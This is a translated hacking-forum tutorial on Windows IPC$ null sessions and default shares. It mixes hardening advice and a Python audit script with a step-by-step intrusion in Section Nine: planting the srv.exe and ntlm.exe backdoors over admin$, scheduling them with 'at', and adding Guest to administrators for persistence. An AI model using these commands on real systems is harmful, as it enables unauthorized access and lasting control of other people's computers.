Foreword:
Articles about IPC$ intrusion are as numerous as hairs on an ox, and the attack steps can even be said to have become a classic model, so nobody bothers to write them up any more.
Even so, I personally feel those articles are not detailed enough. For a rookie touching IPC$ for the first time, a bare list of steps does not answer their confusion (just search any hacking forum for "IPC" and see how many such questions there are).
So I wrote this summary, hoping to clear up some of the easily confused points so that everyone stops stumbling in the same place! If you still have questions after reading this post, please reply right away!
One. What is IPC$
IPC$ (Internet Process Connection) is a resource that shares the "named pipe" (that is what everyone calls it): a named pipe opened for inter-process communication. By verifying a username and password, the connector obtains the corresponding permissions and can remotely manage the computer and view its shared resources.
With IPC$, a connector can even establish a null session with the target host without any username or password (of course the other machine must have IPC$ sharing enabled, otherwise you cannot connect), and over this null session the connector can also obtain the target host's user list (though a responsible administrator will prohibit exporting the user list).
We always talk about the "IPC$ vulnerability", but in fact IPC$ is not a true vulnerability. It is a remote network logon function opened to make the administrator's remote management easier, and it also opens the default shares, that is, all logical disks (C$, D$, E$ ...) and the system directory WinNT or Windows (admin$).
All of this was originally intended to make administration easier, but good intentions do not always produce good results. Some people with ulterior motives (what exactly is a "motive"? I don't know either, it's just a figure of speech) exploit IPC$ to access shared resources, export the user list, and use dictionary tools to probe passwords, hoping to gain higher privileges and so achieve unspeakable purposes.
Two. Points to note:
1) The IPC$ connection is a remote network logon function unique to Windows NT and above, the equivalent of Telnet on UNIX. Because the IPC$ feature needs many DLL functions of Windows NT, it cannot run on Windows 9.x.
That is, only NT/2000/XP can establish an IPC$ connection; 98/ME cannot (though some friends say a null session can be built from 98, I don't know whether that is true; anyway it is 2003 now, and I suggest the 98 comrades change systems, 98 is not cool).
2) Even a null session cannot be established 100% of the time; if the other side has closed IPC$ sharing, you still cannot connect.
3) It is not guaranteed that you can view the other side's user list, because the administrator can prohibit exporting users.
Three. The role of the IPC$ connection in hacker attacks
As mentioned above, even with just a null session you can get a lot of information (and this information is often essential) and access part of the shares. If you can log in as a certain user, you get that user's permissions; obviously, if you log in as administrator, heh heh, nothing more needs to be said: what u want, u can do!!
(Basically you can gather information on the target, manage the target's processes and services, upload and run Trojans, and if it is 2000 Server you can also consider enabling Terminal Services for convenient control. How about that? Pretty sweet!)
But don't get excited too early, because the administrator's password is not so easy to get. Although there are some silly administrators with empty or brain-dead passwords, they are a minority, and it is not like before: as people's security awareness improves, administrators have also become careful, and getting the administrator's password will become harder and harder.
So in the future your most likely outcome is a connection with minimal permissions, and you will slowly discover that the IPC$ connection is not all-powerful; when the host has not enabled IPC$ at all, you cannot even connect.
So I think you should not regard IPC$ intrusion as an ultimate weapon or expect it to win every fight. It is like a pass in a football match: it rarely has a fatal effect, but it is indispensable. I think this is the meaning of the IPC$ connection in hacker intrusion.
Four. The relationship between IPC$, null sessions, ports 139/445 and default shares
The relationship between these four may be something rookies are very confused about, but most articles give no special explanation. In fact my own understanding was not very thorough either; this was summed up through discussion with everyone. (A BBS with a good discussion atmosphere can be called a rookie's paradise.)
1) IPC$ and null sessions:
An IPC$ connection that needs no username or password is a null session; once you log in as a user or administrator (that is, an IPC$ connection with a specific username and password), it can no longer be called a null session.
Many people may ask: since I can connect with a null session, why go to tremendous effort to scan for weak passwords? Heh, the reason was mentioned before: when you log in with a null session you do not have any permissions (very depressing), whereas when you log in as a user or administrator you get the corresponding permissions (who doesn't want permissions? So do it the honest way and don't be lazy).
2) IPC$ and ports 139/445:
The IPC$ connection enables remote logon and access to the default shares, while port 139 is opened by the NetBIOS protocol; we access shared files/printers through port 139 or 445 (Win2000). So generally speaking, the IPC$ connection is supported by port 139 or 445.
3) IPC$ and default shares
The default shares are shares opened by default to make the administrator's remote management easier (you can of course turn them off), that is, all logical disks (C$, D$, E$ ...) and the system directory WinNT or Windows (admin$). We can access these default shares through IPC$ (provided the other side has not turned them off).
Five. Reasons for IPC$ connection failure
The following five reasons are the most common:
1) Your system is not NT or a higher operating system;
2) The other side has not enabled IPC$ default sharing;
3) The other side has not opened port 139 or 445 (blocked by a firewall);
4) Your command is typed incorrectly (for example a missing space);
5) Wrong username or password (for a null session this of course does not apply).
In addition, you can analyze the cause from the error number returned:
Error 5, access denied: very likely the user you are using does not have administrator privileges; elevate privileges first;
Error 51, Windows cannot find the network path: there is a problem with the network;
Error 53, the network path was not found: wrong IP address; the target is not booted; the target's LanmanServer service is not started; the target has a firewall (port filtering);
Error 67, the network name cannot be found: your LanmanWorkstation service is not started; the target has deleted IPC$;
Error 1219, the provided credentials conflict with an existing set of credentials: you have already established an IPC$ connection with the other side; delete it and try again.
Error 1326, unknown username or bad password: the reason is obvious;
Error 1792, an attempt was made to log on but the network logon service was not started: the target's Netlogon service is not started (this happens when connecting to a domain).
Error 2242, this user's password has expired: the target has an account policy that enforces periodic password changes.
IPC$ connections are a fairly complicated matter. Besides the reasons above there are other uncertain factors that I cannot cover in detail; it depends on everyone's own experience and experiments.
Six. How to open the target's IPC$ (this paragraph is from related articles)
First you need a shell that does not rely on IPC$, such as SQL's cmd extension, Telnet or a Trojan; of course this shell must have admin privileges. Then you can run net share ipc$ in that shell to open the target's IPC$. As seen above, whether IPC$ can be used depends on many factors, so confirm that the related services are running; if they are not, start them (if you don't know how, see the usage of the NET command). If it still will not work (for instance a firewall is in the way), it is recommended to give up.
Seven. How to prevent IPC$ intrusion
1. Prohibit null sessions (this operation does not actually prevent a null session from being established; quoted from an article on null sessions under Win2000). First run regedit, find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] and change the value RestrictAnonymous (DWORD) to 00000001 (if it is set to 2, some problems will occur, for example with some Windows services).
2. Prohibit the default shares
1) List the local shared resources
Run - cmd - enter net share
2) Delete the shares (enter one at a time)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (if there are E, F, ... continue deleting)
3) Stop the Server service
net stop server /y (the service starts again after a reboot)
4) Modify the registry
Run - regedit
Server version: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and change the value AutoShareServer (DWORD) to 00000000.
Pro version: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and change the value AutoShareWks (DWORD) to 00000000.
If the value mentioned above does not exist, create it (right-click - New - DWORD value) and then change it.
3. Permanently close IPC$ and default sharing by disabling the related service: LanmanServer, that is, the Server service
Control Panel - Administrative Tools - Services - find the Server service (right-click) - Properties - General - Startup type - Disabled
4. Install a firewall (check its related settings), or use port filtering (filter out 139, 445 and so on), or use the latest version of Optimization Master
5. Set a complex password to prevent password guessing against IPC$
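As an added example (not from the original post), here is a small Python audit that reads the text printed by net share and reg query on a box and reports which of the section Seven settings are still missing. The sample output strings are constructed, and reg query with /v is assumed to print the value in the "Name REG_DWORD 0x.." form used on XP/2003.

```python
import re

# The default shares the page tells you to delete: C$, D$ ..., ADMIN$ and IPC$.
DEFAULT_SHARE_RE = re.compile(r"^(?:[A-Z]\$|ADMIN\$|IPC\$)$", re.IGNORECASE)

def parse_net_share(output):
    """Share names from `net share` output (first column; names containing spaces are not handled)."""
    names = []
    for line in output.splitlines():
        if not line.strip() or line.startswith(("Share name", "---", "The command")):
            continue
        names.append(line.split()[0])
    return names

def default_shares_open(output):
    return [n for n in parse_net_share(output) if DEFAULT_SHARE_RE.match(n)]

def parse_reg_query(output):
    """REG_DWORD values from `reg query <key> /v <name>` output (a missing value prints no such line)."""
    return {m.group(1): int(m.group(2), 16) for m in
            re.finditer(r"^\s+(\S+)\s+REG_DWORD\s+(0x[0-9A-Fa-f]+)\s*$", output, re.M)}

def audit(lsa_out, lanman_out, share_out, is_server):
    """Findings against the section Seven settings; an empty list means the host matches them."""
    findings = []
    if parse_reg_query(lsa_out).get("RestrictAnonymous", 0) != 1:
        findings.append("RestrictAnonymous != 1: null sessions may still enumerate users")
    name = "AutoShareServer" if is_server else "AutoShareWks"
    if parse_reg_query(lanman_out).get(name, 1) != 0:  # absent value: shares are recreated at boot
        findings.append(f"{name} != 0: default shares come back after a reboot")
    findings += [f"default share {n} is currently exported" for n in default_shares_open(share_out)]
    return findings

# Constructed sample output (not captured from a real host) for an unhardened XP/2000 Pro box.
LSA_WEAK = ("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\n"
            "    RestrictAnonymous    REG_DWORD    0x0\n")
LANMAN_WEAK = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\n"
SHARES_WEAK = """Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\\                             Default share
IPC$                                         Remote IPC
ADMIN$       C:\\WINDOWS                      Remote Admin
Tools        D:\\Tools
The command completed successfully.
"""
# The same host after the registry edits and `net share ... /delete` steps from section Seven.
LSA_FIXED = LSA_WEAK.replace("0x0", "0x1")
LANMAN_FIXED = LANMAN_WEAK + "    AutoShareWks    REG_DWORD    0x0\n"
SHARES_FIXED = "\n".join(l for l in SHARES_WEAK.splitlines() if not l.startswith(("C$", "IPC$", "ADMIN$")))
```

Feed audit() the real command output captured on the machine being checked; it returns one line per setting that still deviates from the list above.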
Eight. Related commands
1) Establish a null session:
net use \\IP\ipc$ "" /user:"" (note: this command contains 3 spaces)
2) Establish a non-null connection:
net use \\IP\ipc$ "password" /user:"username" (likewise 3 spaces)
3) Map a default share:
net use z: \\IP\c$ "password" /user:"username" (this maps the other side's C drive to your own Z drive; the other drives follow the same pattern)
If an IPC$ connection has already been established with the target, you can access \\IP\driveletter$ directly; the specific command is net use z: \\IP\c$
4) Delete an IPC$ connection
net use \\IP\ipc$ /del
5) Delete a share mapping
net use c: /del deletes the mapped C drive; the other drives follow the same pattern
net use * /del deletes all mappings; a prompt will ask you to press Y to confirm
Nine. The classic intrusion pattern
This intrusion pattern is too classic; most IPC tutorials have introduced it, and I will quote it too. Thanks to the original author! (I don't know which senior it was.)
1. C:\>net use \\127.0.0.1\ipc$ "" /user:"administrators"
This is an IP address that the "Streamer" scanner found with the username administrators and an "empty" password (empty password? Wow, lucky). If you intend to attack, you can use a command like this to establish a connection to 127.0.0.1: because the password is "empty", nothing is entered in the first pair of quotes, and the part after it is the username, so enter administrators and the command is complete.
2. C:\>copy srv.exe \\127.0.0.1\admin$
First copy srv.exe over (it is in Streamer's Tools directory; the $ refers to admin$, the other side's C:\WinNT\System32\; you can also use C$ or D$, meaning the C and D drives, depending on where you want to copy it).
3. C:\>net time \\127.0.0.1
In the net time output, the current time at 127.0.0.1 is 2002/3/19 11:00 AM, and the command completed successfully.
4. C:\>at \\127.0.0.1 11:05 srv.exe
Start srv.exe with the at command (the time set here must be later than the host's time, or how would it start, heh heh!)
5. C:\>net time \\127.0.0.1
Check again: if the current time of 127.0.0.1 is 2002/3/19 11:05 AM, prepare to run the following command.
6. C:\>telnet 127.0.0.1 99
Here the telnet command is used; note the port is 99. Telnet's default is port 23, but we used SRV to open a port 99 on the other side for us.
Although we can Telnet in, SRV is one-time only; it will not be active the next time! So we plan to build a Telnet service, using NTLM.
7. C:\>copy ntlm.exe \\127.0.0.1\admin$
Use the copy command to upload ntlm.exe to the host (ntlm.exe is also in Streamer's Tools directory).
8. C:\WinNT\System32>ntlm
Enter ntlm to start it (the C:\WinNT\System32 here refers to the other side; running ntlm actually runs this program on the other computer). When "DONE" appears, it has worked. Then use "net start telnet" to start the Telnet service!
9. telnet 127.0.0.1, then enter the username and password to get into the other side; operations are just as simple as on DOS! (And then what do you want to do? Whatever you want, haha!)
Just in case, we will activate Guest and add it to the administrators group.
10. C:\>net user guest /active:yes
Activate the other side's guest user
11. C:\>net user guest 1234
Change guest's password to 1234, or whatever password you want to set
12. C:\>net localgroup administrators guest /add
Make guest an administrator ^_^ (if the admin password changes but the guest account has not, we can use Guest to access this computer again next time)
Ten. Summary:
Having said this much about IPC$ intrusion, I feel it is enough. If there are any inaccurate places, I hope to discuss them with you.